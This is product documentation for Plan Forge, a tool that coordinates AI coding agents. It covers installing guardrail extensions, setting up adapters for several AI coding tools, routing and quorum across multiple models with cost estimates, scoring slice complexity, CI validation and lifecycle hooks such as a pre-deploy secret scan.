📄 Full reference: capabilities, Appendix V — Event Catalog (every WebSocket event grouped by family), EVENTS.md on GitHub, tools.json on GitHub
Install, create, and publish guardrail extensions.
Extensions are packaged bundles of instruction files, agents, and prompts that add domain-specific guardrails to your project. They give you drop-in expertise for domains you haven't solved yet: instead of writing compliance rules from scratch, install a community extension and get pre-built knowledge.
# Browse all extensions
pforge ext search
# Filter by keyword
pforge ext search compliance
# Get details about a specific extension
pforge ext info saas-multi-tenancy
The catalog is also browsable in the Dashboard Extensions tab.
| Extension | Category | What It Adds |
|---|---|---|
saas-multi-tenancy | Architecture | Tenant isolation patterns, RLS enforcement, cache separation, cross-tenant audit |
azure-infrastructure | Cloud | Bicep/Terraform guardrails, resource naming, tagging, cost governance |
plan-forge-memory | Integration | OpenBrain memory, persistent context across sessions, postmortem injection |
# One-step install from catalog
pforge ext add saas-multi-tenancy
# Install from local path
pforge ext install .forge/extensions/my-extension
This copies instruction files to .github/instructions/, agents to .github/agents/, and prompts to .github/prompts/. The extension metadata is tracked in .forge/extensions/.
.forge/extensions/my-extension/extension.json manifest:
{
"name": "my-extension",
"version": "1.0.0",
"description": "Domain-specific guardrails for healthcare",
"author": "your-name",
"category": "compliance"
}
my-extension/
├── extension.json
├── instructions/
│ ├── hipaa-compliance.instructions.md
│ └── phi-handling.instructions.md
├── agents/
│ └── hipaa-reviewer.agent.md
└── prompts/
└── compliance-audit.prompt.md
pforge ext install .forge/extensions/my-extensionpforge ext publish .forge/extensions/my-extensionPublishing generates a catalog entry, it doesn't upload anything. You submit via pull request:
pforge ext publish .forge/extensions/my-extensionextensions/catalog.jsonfeat(catalog): add my-extensionpforge ext publish outputs both a Plan Forge catalog entry and a Spec Kit-compatible extensions.json entry in one command.
# List installed extensions
pforge ext list
# Remove an extension
pforge ext remove healthcare-compliance
📄 Full reference: Extensions guide, PUBLISHING.md on GitHub
One setup, all agents. Configure Plan Forge for 7 AI tools.
CLAUDE.md, .cursorrules, AGENTS.md) so the agent reads Plan Forge's guardrails automatically.-Agent flag.# Add all agent adapters at once
.\setup.ps1 -Preset dotnet -Agent all
# Or pick specific agents
.\setup.ps1 -Preset dotnet -Agent claude,cursor
Copilot files are always installed. The -Agent flag adds native files for other tools, each with all 16 guardrail files embedded, prompts as native skills/commands, and 19 reviewer agents as invocable procedures.
| Feature | Copilot | Claude | Cursor | Codex | Gemini | Windsurf | Generic |
|---|---|---|---|---|---|---|---|
| Auto-loading instructions | ✓ Native | ✓ Emulated | ✓ Emulated | ⚠ Manual | ✓ Emulated | ✓ Emulated | ✗ |
| Pipeline agents | ✓ 6 | ✓ Skills | ✓ Commands | ✓ Skills | ✓ Commands | ✓ Workflows | ✗ |
| Reviewer agents | ✓ 19 | ✓ 19 | ✓ 19 | ✓ 19 | ✓ 19 | ✓ 19 | ✗ |
| MCP tools | ✓ | ✓ | ✓ | ⚠ Partial | ⚠ Partial | ⚠ Partial | ✗ |
| Full Auto execution | ✓ | ✓ | ✓ | ✓ | ⚠ | ✓ | ✗ |
| Lifecycle hooks | ✓ | ✓ Emulated | ✗ | ✗ | ✗ | ✗ | ✗ |
| Memory bridge | ✓ OpenBrain | ✓ Native | ⚠ | ⚠ | ⚠ | ⚠ | ✗ |
Native integration. Instruction files auto-load via applyTo. Agents appear in the agent picker. Skills invoke via /slash-command. Hooks run automatically. This is the reference implementation, all other agents emulate this behavior.
Key file: .github/copilot-instructions.md
All guardrails embedded in a single CLAUDE.md file. Claude Code reads this automatically at project root. Includes 33+ skills as slash commands, full auto mode, and memory hooks.
Key file: CLAUDE.md
.\setup.ps1 -Preset dotnet -Agent claude
Rules written to .cursorrules and .cursor/rules/*.mdc. Cascade integration loads rules automatically based on file patterns.
Key files: .cursorrules, .cursor/rules/
Skills as executable scripts in .agents/skills/. Terminal-based execution with all pipeline steps available.
Key file: AGENTS.md
Guardrails embedded in GEMINI.md. Commands as .gemini/commands/*.toml files for /planforge-* invocations.
Key files: GEMINI.md, .gemini/commands/
Rules in .windsurfrules and .windsurf/rules/*.md with trigger frontmatter. Workflows mapped to Cascade integration.
Key files: .windsurfrules, .windsurf/rules/
A single AI-ASSISTANT.md file with copy-paste guardrails. Works with ChatGPT, Ollama, or any tool that accepts text prompts.
Key file: AI-ASSISTANT.md
GitHub's Copilot cloud agent uses the same copilot flag, no separate adapter needed. Add copilot-setup-steps.yml to provision the agent's environment:
cp templates/copilot-setup-steps.yml .github/copilot-setup-steps.yml
The cloud agent gets all guardrails, MCP tools, and pforge run-plan automatically.
Across all seven agents, one challenge remains: each tool starts each session with a blank slate. OpenBrain solves this by acting as a shared, persistent memory layer that every agent reads from and writes to, regardless of which tool authored the thought.
When Claude Code resolves an architectural ambiguity, that decision is captured as a thought. When you switch to Copilot the next morning, it retrieves that thought before writing a single line. When your team's Cursor instance encounters the same pattern, it inherits the same guardrails. The agents change; the institutional knowledge compounds.
pforge recall CLI to inject context at session start. The Generic adapter includes copy-paste recall snippets.
For a deep dive into the three-tier memory architecture (in-RAM hub → local JSONL → pgvector semantic index), see Unified Memory Across Agents in Chapter 24.
See also: One Framework, Seven AI Agents, a practical walkthrough of how a mixed-agent team operates on a shared Plan Forge project without knowledge silos.
If you use Spec Kit for specifications, Plan Forge picks up where your specs end. The setup wizard auto-detects existing Spec Kit files and imports them as context. Extensions marked speckit_compatible work in both frameworks.
📄 Full reference: AGENT-SETUP.md on GitHub
Model routing, quorum mode, cost optimization, CI integration, and resume strategies.
Assign different models per role in .forge.json:
Same principle as a human team: let the junior do the legwork, the senior does the final check. Costs less, catches more.
{
"modelRouting": {
"default": "grok-4",
"execute": "claude-sonnet-4.6",
"review": "claude-opus-4.6"
}
}
Use a fast/cheap model for execution and a more capable model for review. The orchestrator routes each slice to the appropriate model based on its role.
Models are split into two routing classes that determine how the orchestrator reaches them:
| Class | Models | Routing |
|---|---|---|
DIRECT_API_ONLY | grok-*, dall-e-* | HTTP API only. No CLI proxy exists. Requires XAI_API_KEY / OPENAI_API_KEY. |
COPILOT_SERVABLE | gpt-*, chatgpt-* (incl. gpt-5.3-codex) | Prefers gh copilot CLI proxy when available (uses your Copilot subscription). Falls back to direct OpenAI API if OPENAI_API_KEY is set. |
| Everything else | Claude, Gemini, etc. | CLI-first via the matching agent CLI (claude, gemini, etc.) |
This split (Phase-34, fixes #103) means gpt-* models no longer drop from auto-quorum when OPENAI_API_KEY is unset but gh-copilot is installed. The old pattern conflated “requires direct API” with “routed via HTTP” and unfairly penalized Copilot users.
When a model fails a slice, the orchestrator automatically escalates to the next model in the chain:
{
"escalationChain": ["grok-4", "claude-opus-4.6", "gpt-5.2-codex"]
}
Model A fails → Model B retries the same slice → Model C if B fails too. Emits slice-escalated WebSocket event at each step. No manual intervention required.
loadEscalationChain() reorders models by success rate × cost efficiency. The best-performing, cheapest model moves to position 1 automatically. No configuration needed, just run plans and the forge learns.
Multi-model consensus for complex slices. Multiple models analyze the same problem independently, then a reviewer synthesizes the best approach.
copilot CLI is logged in, --quorum=power|speed|auto fans out across multiple models without any API keys, each leg is a separate copilot subprocess invoked with a different --model flag. The orchestrator's quorum dispatcher (quorumDispatch) calls spawnWorker once per model inside Promise.all; filterQuorumModels drops any model whose CLI/credentials aren't reachable so the quorum gracefully degrades instead of failing.XAI_API_KEY (or drop it in .forge/secrets.json) and a Grok leg joins the same parallel fan-out alongside your Copilot-served legs, see the worked example below.dispatchQuorum, which is HTTP-only and does require per-model API keys. That surface only powers the chat reasoning lane, not run-plan.
# Force quorum on all slices
pforge run-plan docs/plans/Phase-7.md --quorum
# Auto-quorum: only trigger for complex slices (threshold ≥ 6)
pforge run-plan docs/plans/Phase-7.md --quorum=auto
# Custom threshold (1-10, higher = fewer slices use quorum)
pforge run-plan docs/plans/Phase-7.md --quorum=auto --quorum-threshold 8
# Flagship preset (Opus + GPT-5.3-Codex + Grok 4.20, threshold 5)
pforge run-plan docs/plans/Phase-7.md --quorum=power
# Fast preset (Sonnet + GPT-5.4-mini + Grok 4.1 Fast, threshold 7)
pforge run-plan docs/plans/Phase-7.md --quorum=speed
| Setting | Effect | Cost Impact |
|---|---|---|
--quorum | Every slice gets multi-model consensus | 3× normal cost |
--quorum=auto | Only slices above complexity threshold | 1.2–1.5× normal cost |
--quorum=power | Flagship models (Opus + GPT-5.3-Codex + Grok 4.20), threshold 5, 5min timeout | 3× at threshold 5 |
--quorum=speed | Fast models (Sonnet + GPT-5.4-mini + Grok 4.1 Fast), threshold 7, 2min timeout | 1.5× at threshold 7 |
| No flag | Single model per slice | 1× baseline cost |
The most common production setup: ride your Copilot subscription for the bulk of the quorum, add one direct-API leg (Grok or OpenAI) for diversity. Both kinds of leg run in the same Promise.all, no special config to "merge" them.
Step 1: declare the model mix in .forge.json:
.forge.json{
"quorum": {
"models": [
"gpt-5.3-codex", // → copilot CLI subprocess
"claude-sonnet-4.6", // → copilot CLI subprocess
"grok-4.20-0309-reasoning" // → direct-API worker (XAI_API_KEY)
],
"reviewerModel": "claude-opus-4.7" // → copilot CLI subprocess
}
}
Step 2: provision the Grok key (one of):
# Option A: env var (per-shell)
$env:XAI_API_KEY = "xai-..."
# Option B: project-local secrets file (gitignored)
# .forge/secrets.json
{ "XAI_API_KEY": "xai-..." }
Step 3: run with quorum:
# See the projected cost across all four modes first (always tool-backed)
pforge run-plan --estimate docs/plans/Phase-7.md
# Then run, quorum-eligible slices fan out to all three models in parallel
pforge run-plan docs/plans/Phase-7.md --quorum=auto
What happens at slice dispatch:
quorumDispatch sees three models in the config.spawnWorker is called three times concurrently. The first two route to the local copilot CLI (no key needed, rides your Copilot subscription); the third routes to the xAI HTTP worker using XAI_API_KEY.quorumReview synthesises them via the reviewer model into a single enhancedPrompt.If the Grok key is missing, filterQuorumModels drops Grok from the list at run-plan startup and the quorum proceeds with the two Copilot-served legs, no failure, just a smaller jury.
Two surfaces use the word "quorum." They're related but operate at different scopes:
| Quorum Mode (this section) | Quorum Advisory (Forge-Master) | |
|---|---|---|
| Where | forge_run_plan / --quorum=… | forge_master_ask / Studio tab |
| Decision unit | Per slice | Per prompt |
| Auto-winner? | Yes, reviewer synthesizes one approach | No, human picks the reply |
| Activation | --quorum=auto/power/speed CLI flag | forgeMaster.quorumAdvisory: "auto" \| "always" in .forge.json |
| Cost preview | forge_estimate_quorum tool | quorum-estimate SSE event before dispatch (cancellable) |
| Best for | High-complexity slice execution that benefits from multi-model consensus | High-stakes judgment calls (architectural choices, trade-offs) where dissent is the signal |
You can use both. Quorum Mode runs slice execution; Quorum Advisory helps you decide what to put in the slice in the first place.
forge_estimate_quorum v2.83+forge_estimate_quorum first. Hand-computed quorum estimates have been observed to overshoot reality by an order of magnitude (Phase-COST-TOKEN-COVERAGE field reports). The agent guidance shipped in .github/copilot-instructions.md requires this for any quorum picker UI.
forge_estimate_quorum projects the cost of a plan under all four quorum modes in one round-trip, no need to call --estimate four separate times. It returns per-mode totals plus a per-slice breakdown showing which slices cleared the threshold.
// Direct MCP call
forge_estimate_quorum({
planPath: "docs/plans/Phase-7.md",
resumeFrom: 1 // optional, only estimate slices ≥ N
})
// CLI equivalent (runs all four modes under the hood)
pforge run-plan docs/plans/Phase-7.md --estimate --quorum-compare
{
"false": { "totalCostUSD": 0.28, "baseCostUSD": 0.28, "overheadUSD": 0,
"quorumSliceCount": 0, "totalSliceCount": 7, "confidence": "historical" },
"auto": { "totalCostUSD": 0.42, "baseCostUSD": 0.28, "overheadUSD": 0.14,
"quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
"power": { "totalCostUSD": 12.50, "baseCostUSD": 0.42, "overheadUSD": 12.08,
"quorumSliceCount": 3, "totalSliceCount": 7, "confidence": "historical" },
"speed": { "totalCostUSD": 1.20, "baseCostUSD": 0.31, "overheadUSD": 0.89,
"quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
"slices": [
{ "sliceNumber": 1, "complexityScore": 3, "projectedCostUSD": 0.04, "quorumEligible": false },
{ "sliceNumber": 2, "complexityScore": 6, "projectedCostUSD": 4.18, "quorumEligible": true },
{ "sliceNumber": 3, "complexityScore": 7, "projectedCostUSD": 4.22, "quorumEligible": true },
...
]
}
| Field | Meaning |
|---|---|
baseCostUSD | What the plan costs without quorum overhead, single-model run for every slice |
overheadUSD | Δ added by the extra quorum legs + reviewer synthesis. baseCostUSD + overheadUSD = totalCostUSD. |
quorumSliceCount | How many slices cleared the mode's threshold and will fan out to multiple models |
confidence | "historical" when calibrated against ≥ 3 prior runs, "heuristic" for cold-start projects |
slices[].complexityScore | The 1–10 score from scoreSliceComplexity() |
slices[].quorumEligible | Whether this slice cleared the threshold for the requested mode |
The numbers above come from the heuristic fixture used in capabilities.mjs, illustrative, not measured. For a typical mid-size plan (10–15 slices, 1–3 quorum-eligible), real-world numbers from the Plan Forge dogfood corpus look like:
| Mode | Total cost | Multiplier vs baseline | Slices fanned out | Use when |
|---|---|---|---|---|
false (off) | ~$0.30 – $2.00 | 1.0× | 0 / 12 | Mechanical work, conversions, doc edits |
--quorum=auto | ~$0.40 – $3.50 | 1.2 – 1.8× | 1–2 / 12 | Default for normal feature work |
--quorum=speed | ~$1.00 – $4.00 | 1.5 – 2.5× | 1 / 12 (threshold 7) | Tight budget, want consensus only on the genuinely hard slices |
--quorum=power | ~$10 – $25 | 10 – 30× | 2–4 / 12 (threshold 5) | Architectural slices, security-critical paths, irreversible migrations |
--quorum (force-all) | ~$30 – $80 | 30 – 100× | 12 / 12 | Almost never. Use auto + selective --quorum-threshold instead. |
Numbers are order-of-magnitude, actual cost depends on slice scope size, host (subscription-covered vs pay-per-token), and the cost-calibration ratio in .forge/cost-history.json. Always estimate before running.
forge_estimate_slice (companion tool) returns cost for one slice with rationale strings like "threshold 5 met: complexity 6" or "mode false: quorum disabled". Useful when you want to ask “is this specific slice worth quorum?” without re-estimating the whole plan.
What makes a slice "complex enough to need quorum"? The orchestrator's scoreSliceComplexity() function (see orchestrator.mjs) reads seven weighted signals from the parsed slice and produces an integer 1–10. Modes then compare that score against their threshold to decide whether to fan out.
| Signal | Weight | Source | What it captures |
|---|---|---|---|
| Scope breadth | 0.20 | slice.scope[].length / 5 | How many files this slice touches. Wide scope ⇒ more places to make a mistake. |
| Dependencies | 0.20 | slice.depends[].length / 4 | How many earlier slices this one builds on. Deep dependencies ⇒ harder reasoning chain. |
| Security keywords | 0.15 | Hits in title + tasks + gate | Matches against auth, crypto, secret, token, password, jwt, oauth, …. Security mistakes are expensive to roll back. |
| Database keywords | 0.15 | Hits in title + tasks + gate | Matches against migration, schema, sql, index, constraint, foreign key, …. Schema changes are often irreversible. |
| Gate complexity | 0.10 | Non-blank lines in validationGate | A long validation gate is a proxy for "this slice has a lot of correctness conditions to satisfy." |
| Task count | 0.10 | slice.tasks[].length / 10 | Many small tasks ⇒ more chances for a single model to lose track. |
| Historical failure rate | 0.10 | .forge/runs/index.jsonl (last 20) | If past slices with similar title words have failed often, this one gets nudged up. Self-tuning over time. |
The raw weighted sum (0–1) is mapped to the final integer via clamp(1, 10, round(raw × 9) + 1).
| Mode | Threshold | What clears it (typical) |
|---|---|---|
--quorum=power | 5 | Slices touching 3+ files or with deep deps or mentioning auth/schema |
--quorum=auto | 6 (CLI default) | The above plus a substantial gate or 6+ tasks |
--quorum=speed | 7 | Only the genuinely hard slices, wide scope and security/db keywords and failure history |
| Custom | --quorum-threshold N | Override per run; 1 = quorum everything, 10 = quorum almost nothing |
power mode (catches the architectural slices), threshold 6 is conservative for auto (catches roughly 10–25% of slices in a typical phase), and threshold 7 fires on <5% of slices. The Adaptive Quorum Threshold system in .forge/quorum-history.json auto-tunes these from your project's run history.
Consider a slice titled "Add JWT refresh-token rotation with Redis backing" with 4 scope files, depends on slices 2 and 5, 7 tasks, a 12-line validation gate, and 1 prior failure in 8 historical matches:
scope = min(4/5, 1.0) × 0.20 = 0.16
depends = min(2/4, 1.0) × 0.20 = 0.10
security = min(2/3, 1.0) × 0.15 = 0.10 // "jwt", "token"
database = min(0/3, 1.0) × 0.15 = 0.00
gate = min(12/5, 1.0) × 0.10 = 0.10
tasks = min(7/10, 1.0) × 0.10 = 0.07
history = (1/8) × 0.10 = 0.0125
──────
raw = 0.5425
score = clamp(1, 10, round(0.5425 × 9) + 1) = 6
→ clears threshold for: power (≥5), auto (≥6)
→ does NOT clear: speed (≥7)
PFORGE_QUORUM_TURN v2.78+When quorum runs in multi-agent mode (Claude → Codex → Cursor handoffs), the orchestrator sets the PFORGE_QUORUM_TURN environment variable for the duration of each quorum-leg invocation. This is a coordination signal, not user-facing config, but it shows up in logs and matters when debugging hook behavior.
| Hook / system | Behavior when PFORGE_QUORUM_TURN is set |
|---|---|
PreAgentHandoff hook | Skipped. Returns { triggered: false, skippedReason: "PFORGE_QUORUM_TURN active" } and logs [PreAgentHandoff] skipping context injection, PFORGE_QUORUM_TURN active. See orchestrator.mjs ~L7585. |
| OpenClaw snapshot post | Skipped. No drift / MTTR / incident snapshot is sent between quorum legs. |
| Cost telemetry | Per-leg cost is tagged quorumTurn: true in slice-N.json so the Cost Report can roll up the legs into a single quorum line item. |
| Tracing | Each leg gets its own trace span but with a shared quorumGroupId so dashboards can collapse them. |
Quorum exists to get independent analyses from each model. If PreAgentHandoff injected the same drift / MTTR / open-incident context into every leg, the models would converge, defeating the whole point. The reviewer (the synthesizing model) does get the full handoff context when it merges the proposals, because that's where the project-wide state actually matters.
PreAgentHandoff to silently skip, which can mask drift alerts. If you see "PFORGE_QUORUM_TURN active" in logs outside a quorum run, something has leaked the variable; clear it with Remove-Item Env:PFORGE_QUORUM_TURN (PowerShell) or unset PFORGE_QUORUM_TURN (bash).
📄 Cross-references: Chapter 13 — Multi-Agent for the handoff model · Chapter 20 — Remote Bridge for the OpenClaw snapshot path · Forge-Master Quorum Advisory for the per-prompt counterpart.
The argument for quorum mode is mostly abstract, "synthesis effect," "independent analyses," "reviewer picks the cleaner approach." A single side-by-side run of the same task makes the argument concrete. The numbers below come from a controlled A/B run on a real C# invoicing slice: same plan, same gates, same acceptance criteria; one execution with the default single-model worker, one with three-model quorum. Both passed all gates and the independent reviewer. The difference is in how they passed.
| Metric | Single (control) | Quorum (3-model) |
|---|---|---|
| Tests written | 15 | 18 (+20%) |
| Helper extraction | Inline code, repeated 3× | Extracted helpers, single source |
| Test dates | Hardcoded literals | Relative offsets |
| .NET pattern | Generic ValidationException | ArgumentException.ThrowIfNullOrWhiteSpace |
| Edge cases | Standard happy path | Voided invoice regen, sequence races |
| Total cost | $0.62 | $0.84 (+35%) |
$0.22 of additional spend, both pass review, and the quorum run is measurably more maintainable. Four named patterns drive the difference.
The single-model run inlined volume-discount math in three call sites with slight variations. The quorum run extracted reusable helpers because the synthesizer saw multiple proposals and picked the one that didn't repeat itself.
IsWeekend(), CalculateVolumeDiscount(), and ApplyBankersRounding() as private static helpers, called from each invoicing entry point. The single-model run inlined the equivalent ternary expressions at every call site. Same behavior; different debuggability when the discount tier changes a year from now.
// Single model, inlined at three call sites
var discount = quantity >= 100 ? 0.15m : quantity >= 50 ? 0.10m : quantity >= 10 ? 0.05m : 0m;
// Quorum, extracted helper
private static decimal CalculateVolumeDiscount(int quantity) => quantity switch
{
>= 100 => 0.15m,
>= 50 => 0.10m,
>= 10 => 0.05m,
_ => 0m,
};
Single-model tests pinned dates to literal calendar days. Those tests will fail when those dates pass and the business logic correctly refuses future invoices. Quorum tests used relative offsets that stay green forever.
new DateTime(2026, 3, 15) in test fixtures. The quorum run wrote DateTime.Now.AddDays(-7). Identical intent; only one survives March 16th.
// Single model, breaks on April 16th
var invoice = new Invoice { Date = new DateTime(2026, 3, 15) };
// Quorum, stays green forever
var invoice = new Invoice { Date = DateTime.Now.AddDays(-7) };
Validation guard clauses are a tell. The control run used the generic exception path; the quorum run reached for the modern static-helper API that ships better error messages and is the current recommended pattern.
throw new ValidationException("Customer name is required"). The quorum run used ArgumentException.ThrowIfNullOrWhiteSpace(customerName). The quorum reviewer chose the .NET 7+ helper because one of the three workers proposed it; the synthesizer recognized it as the modern equivalent.
// Single model, generic, manual message
if (string.IsNullOrWhiteSpace(customerName))
throw new ValidationException("Customer name is required");
// Quorum, modern .NET 7+ helper, auto-generated message including parameter name
ArgumentException.ThrowIfNullOrWhiteSpace(customerName);
The +3 tests in the quorum run weren't padding. They were edge cases the single model never wrote because no one model considered both the happy path and the failure mode at the same time. With three independent analyses, edge cases that one model thinks of get surfaced into the synthesis.
VoidedInvoice_Regenerate_AssignsNewSequenceNumber) and a test for "concurrent invoice number assignment under two simultaneous requests" (ConcurrentInvoiceCreation_DoesNotReuseSequenceNumbers). Neither appeared in the control run. Both are exactly the kind of test that catches a production bug six weeks after launch.
The pattern across all four examples is the same: one model proposes one thing, another model proposes a cleaner version, the reviewer picks the cleaner one. Inline code vs extracted helper, extraction wins. Hardcoded date vs relative offset, relative offset wins. Generic exception vs modern helper, modern helper wins. Standard tests vs edge-case tests, edge-case tests win. The quorum doesn't make any individual model smarter; it makes the worst-case output of each model less likely to be what ships.
| Slice type | Quorum worth it? | Why |
|---|---|---|
| Auth / billing / payments | Yes | Edge cases here are production bugs that cost money; +35% cost is cheap insurance |
| Database migrations | Yes | Wrong migration is irreversible; multi-model agreement is a meaningful signal |
| Architectural slices (new layer, new pattern) | Yes | The synthesis effect produces noticeably cleaner abstractions |
| Bug fix with tight reproducer | Maybe | If the fix is one line and the test is obvious, single model is fine |
| CRUD endpoint, well-trodden pattern | Probably not | All three models will produce nearly identical code; +35% cost buys nothing new |
| Pure docs slice | No | Synthesis effect doesn't apply to prose; pick the cheapest model that writes well |
--quorum=auto applies this judgment per slice using the complexity scoring rubric. Manual --quorum=power and --quorum=speed let you force the call when you already know which slices are which. The discovery harness uses single-model dispatch by default because audit findings are mechanical; the auto-smelt loop is the place to catch defects, not the discovery pass.
📄 Source: Quorum Mode — What 3 Models Catch That 1 Doesn't on the Plan Forge blog (the controlled A/B run that produced this comparison).
Plan Forge runs in different IDEs and CLI hosts (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, the bare CLI). Each host has its own billing surface. The host-aware routing preference (added v2.82, fixes #104) ensures users on non-Copilot hosts don't silently double-pay against subscriptions they're already paying for.
| Mode | Behavior | When to use |
|---|---|---|
auto (default) | Claude Code / Cursor / Windsurf / Zed prefer direct API first; VS Code + Copilot / CLI keep gh-copilot first | Recommended. Honors whatever subscription the user is paying for. |
gh-copilot | Always prefer gh copilot regardless of host | You want all spend to land on your Copilot subscription |
direct-api | Always prefer direct HTTP APIs regardless of host | You're scripting with explicit per-call cost tracking |
drop | Refuses gpt-* on non-Copilot hosts unless OPENAI_API_KEY is set. Strongest "honor the vendor" stance. | You want to fail loudly rather than spend silently |
{
"routing": {
"hostPreference": "auto" // "auto" \| "gh-copilot" \| "direct-api" \| "drop"
}
}
Before any model fires in quorum mode, the orchestrator emits a per-model billing surface table to stdout:
Quorum Pre-Run Summary (host: claude-code, preference: auto)
✓ claude-opus-4.7 → anthropic-direct ($0.0061/req)
✓ gpt-5.3-codex → openai-direct ($0.0048/req)
⚠ grok-4.20 → xai-direct ($0.0033/req) needs XAI_API_KEY
✓ claude-sonnet-4.6 → anthropic-direct ($0.0019/req)
Per-slice telemetry now records host, billingSurface, and billingWarning in slice-N.json so cost aggregation can distinguish subscription-covered vs pay-per-token spend in the Cost Report.
The orchestrator tracks model performance in .forge/model-performance.json, success rate, average cost, and duration per model. It auto-selects the cheapest model with >80% historical pass rate.
--estimate accuracy improves automatically..forge/quorum-history.json to learn which slices actually need quorum. If <20% needed it, threshold rises (fewer quorum runs = lower cost). If >60% needed it, threshold drops.--estimate flags slices with 2+ prior failures or >6 tasks as candidates for splitting. Smaller slices cost less and succeed more often.pforge run-plan --estimate docs/plans/Phase-7.mdpforge cost or Dashboard Cost tab--model flagContext: lists per slice (see Chapter 4)API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.
For local development, store keys in the gitignored .forge/secrets.json:
{
"XAI_API_KEY": "xai-...",
"OPENAI_API_KEY": "sk-..."
}
The .forge/ directory is in .gitignore by default, secrets are never committed.
Add Plan Forge validation to your GitHub Actions PR workflow:
- uses: srnichols/plan-forge-validate@v1
with:
analyze: true # Run consistency scoring
sweep: true # Check for TODO/FIXME markers
threshold: 60 # Minimum analyze score to pass
PRs that fail the threshold are blocked from merging. The action validates file counts, checks for unresolved placeholders, and runs pforge analyze.
GitHub's Copilot cloud agent works on issues autonomously. Plan Forge integrates via .github/copilot-setup-steps.yml, which provisions the agent with Node.js, guardrails, MCP tools, and smith verification before it starts coding.
The orchestrator builds a DAG from [P] tags and [depends: Slice N] declarations. Independent slices run concurrently when workers are available. Merge checkpoints validate that all parallel branches resolved cleanly.
[scope:] paths, the orchestrator flags the conflict before execution starts.
# Resume from slice 3 after fixing a failure
pforge run-plan docs/plans/Phase-7.md --resume-from 3
# Dry run, parse and validate without executing
pforge run-plan docs/plans/Phase-7.md --dry-run
When a gate fails, fix the issue manually, then resume. Completed slices are skipped, only remaining slices execute.
The OpenBrain integration bridges the 4-session pipeline with long-term, cross-session context. Prior decisions, patterns, and postmortems are automatically searched and injected at the start of each session. After every run, lessons are captured for future phases.
As of v3.6, OpenBrain is the documented L3 memory layer, still optional, but loud and easy to enable. Check status with pforge brain status; see install options with pforge brain hint. Plan Forge works without it; the inner loop (Reflexion, Auto-skills, Federation) only improves over time with it. See Project History → v3.6.
Install via extension: pforge ext add plan-forge-memory
Three hooks fire automatically during agent sessions to enforce operational safety:
| Hook | Trigger | Behavior | Blocking |
|---|---|---|---|
| PreDeploy | Before deploy-related file writes or commands | Runs forge_secret_scan + forge_env_diff, blocks on findings | Yes |
| PostSlice | After every slice commit | Runs forge_drift_report, warns on drift regression | No (advisory) |
| PreAgentHandoff | At session start when resuming work | Injects LiveGuard context into agent prompt | No |
Configure in .forge.json:
{
"hooks": {
"preDeploy": { "blockOnSecrets": true, "warnOnEnvGaps": true, "scanSince": "HEAD~1" },
"postSlice": { "silentDeltaThreshold": 5, "warnDeltaThreshold": 10, "scoreFloor": 70 },
"preAgentHandoff": { "injectContext": true, "cacheMaxAgeMinutes": 30, "minAlertSeverity": "medium" }
}
}
See Chapter 16 — What Is LiveGuard? for the full operational intelligence overview.
📄 Full reference: capabilities, CLI Reference — run-plan
The canonical overview. How Plan Forge's deterministic slice executor, the Phase-25 reflective layer, and the Phase-26 competitive layer compose into a single self-deterministic agent loop.
Plan Forge's slice executor is deterministic: same plan, same config, same model routing, same outcome. On top of that spine, the Phase-25 and Phase-26 subsystems let the loop observe itself and feed what it learns back into the next slice, the next plan, or a sibling project. The execution contract stays deterministic; the loop's context gets progressively better-informed. That combination is what we mean by self-deterministic:
The outer pipeline is the same one Plan Forge has always had. The inner loop adds callback arrows that let later stages feed earlier stages without breaking the forward progression.
Two things to notice: first, every backward arrow from Execute, Sweep, and Review is opt-in or advisory by default, the forward pipeline stays honest. Second, the arrow from Execute back to Harden crosses a plan boundary: a postmortem written at the end of this run is read by the hardener at the start of the next one.
Zooming into a single slice, here is what happens at the slice boundary and how each Phase-25 and Phase-26 subsystem feeds something downstream, the next slice, the next plan's hardener, or a Dashboard promotion surface.
The Phase-25 subsystems are labeled L1–L8 in the capabilities surface (forge_capabilities → innerLoop); the Phase-26 subsystems, C1 competitive, C2 auto-fix, C3 cost-anomaly, extend the same surface. Every node in the diagram corresponds to one entry in INNER_LOOP_SURFACE.subsystems.
Every subsystem, the stage at which it fires, and where its output shows up. See the companion chapters for mechanics and configuration.
| Subsystem | Fires at | Output lands in | Default posture |
|---|---|---|---|
| Reflexion (L7) | Gate fail → retry | Next attempt's prompt | Always on |
| Trajectory (L8) | Slice pass | .forge/trajectories/ | Always on |
| Auto-skill library (L2) | Slice pass → next slice | .forge/auto-skills/ | Always on |
| Adaptive gate synthesis (L6) | Pre-flight | Stdout + Dashboard promotion surface | Suggest (never mutates plans) |
| Postmortem (L5) | Run end | .forge/plans/<basename>/postmortem-*.json | Always on (retention 10) |
| Federation (L4-lite) | Brain miss → cross-repo read | In-memory recall | Off (opt-in, absolute local paths) |
| Reviewer (L4) | Gate-check | Gate-check response, Dashboard | Off, advisory-only |
| Competitive (C1) | Slice start (marked competitive) | Winner's worktree → tree | Off (opt-in) |
| Auto-fix (C2) | Gate fail + small diff | .forge/proposed-fixes/ | Advisory (never auto-apply) |
| Cost-anomaly (C3) | Every slice | .forge/cost-anomalies.jsonl, Dashboard | Advisory (detection only) |
The individual subsystems are useful on their own. The mesh is what turns a slice runner into a self-deterministic loop: a trajectory written today becomes part of tomorrow's planning context; a cost anomaly noticed this run becomes the reason next run's hardener picks a cheaper model for that slice; a gate command accepted three times graduates into the validation template for that domain. None of this changes the deterministic execution contract, it only changes the information the deterministic executor runs with.
Seven subsystems, reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, and the opt-in reviewer, that turn every slice into a research step.
For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.
The deterministic slice executor (Phase-1 through Phase-24) is the spine. The Phase-25 subsystems bolt on reflective behavior at specific transitions, they never replace the spine, they only enrich it.
Each subsystem has a single job, a single config key (if any), and a single storage artifact. Add them up and you get a closed research loop where every run teaches the next.
When a slice's validation gate fails, the orchestrator builds a compact Markdown block with the gate command, model, duration, and the stderr tail (≤2KB). That block is injected into the next attempt's prompt so the worker reasons about its prior failure instead of blindly trying the same thing.
pforge-mcp/memory.mjs → buildReflexionBlock()On slice pass, Plan Forge extracts the sentinel-wrapped note the worker produced (<!-- PFORGE_TRAJECTORY:BEGIN -->…<!-- PFORGE_TRAJECTORY:END -->), word-caps it at 500, and writes it to disk. Postmortems and federation consumers read these for compact run narratives.
